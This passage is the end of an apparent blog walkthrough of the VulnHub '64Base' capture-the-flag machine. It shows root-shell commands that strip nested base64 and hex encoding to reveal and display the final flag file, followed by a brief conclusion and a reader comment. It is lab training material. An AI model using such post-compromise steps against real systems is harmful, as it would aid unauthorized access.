root@64base:~# echo 'NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK' | base64 -d | xxd -r -p
NTk2ZDQ2N2E1YTU0NTkzMDQ5NDMzMTZiNDk0MzM5MzI1OTU4NDk3NjYyNDczOTZhNTk1Nzc3NzY0YzZkNzgzMTYxMzI1NjM4NjI0NzU2N2E2Mzc5MzU3OTVhNTc0NjczNDM2NzNkM2QwYQo=
root@64base:~# echo 'NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK' | base64 -d | xxd -r -p | base64 -d
596d467a5a5459304943316b49433932595849766247396a595777764c6d7831613256386247567a637935795a57467343673d3d0a
root@64base:~# echo 'NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK' | base64 -d | xxd -r -p | base64 -d | xxd -r -p
YmFzZTY0IC1kIC92YXIvbG9jYWwvLmx1a2V8bGVzcy5yZWFsCg==
root@64base:~# echo 'NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK' | base64 -d | xxd -r -p | base64 -d | xxd -r -p | base64 -d
base64 -d /var/local/.luke|less.real
root@64base:~# base64 -d /var/local/.luke|less.real
-----SNIP-----
____________________________________________________________________________
  ______  ______  ______  ______  ______  ______  ______  ______
 |______||______||______||______||______||______||______||______||______|
  _   _   ____ __          __ __     __ ____   _    _  _  _____   ______
 | \ | | / __ \\ \        / / \ \   / // __ \ | |  | |( )|  __ \ |  ____|
 |  \| || |  | |\ \  /\  / /   \ \_/ /| |  | || |  | ||/ | |__) || |__
 | . ` || |  | | \ \/  \/ /     \   / | |  | || |  | |   |  _  / |  __|
 | |\  || |__| |  \  /\  /       | |  | |__| || |__| |   | | \ \ | |____
 |_| \_| \____/    \/  \/        |_|   \____/  \____/    |_|  \_\|______|
                                _  ______  _____  _____  _
             /\                | ||  ____||  __ \|_   _|| |
            /  \               | || |__   | |  | | | |  | |
           / /\ \          _   | ||  __|  | |  | | | |  | |
          / ____ \        | |__| || |____ | |__| |_| |_ |_|
         /_/    \_\        \____/ |______||_____/|_____|(_)
  ______  ______  ______  ______  ______  ______  ______  ______  ______
 |______||______||______||______||______||______||______||______||______|
                    I hope you enjoyed this challenge
                    Please leave comments & feedback
                    @ https://www.vulnhub.com/?q=64base
                    -----------------------------------
                    64Base Challenge by 3mrgnc3
                    https://3mrgnc3.ninja/challenges
                    -----------------------------------

Conclusion

This was an awesome challenge which had a lot of tricks up its sleeve.
When I finally thought I was on the right track I hit a dead end. After a while it felt like a maze in which I needed to find my way.
A great job of building this challenge and many thanks to 3mrgnc3 and vulnhub.com.
Can’t wait for the next challenge.
 
 
 
 
 
 
 
 
 
 
 

2 thoughts on “64Base: 1.0.1

  1. It is not my first time to go to see this web site, i am visiting this web site dailly and obtain good information from here all the time.

Leave a Reply to DonnaDeeft Cancel reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.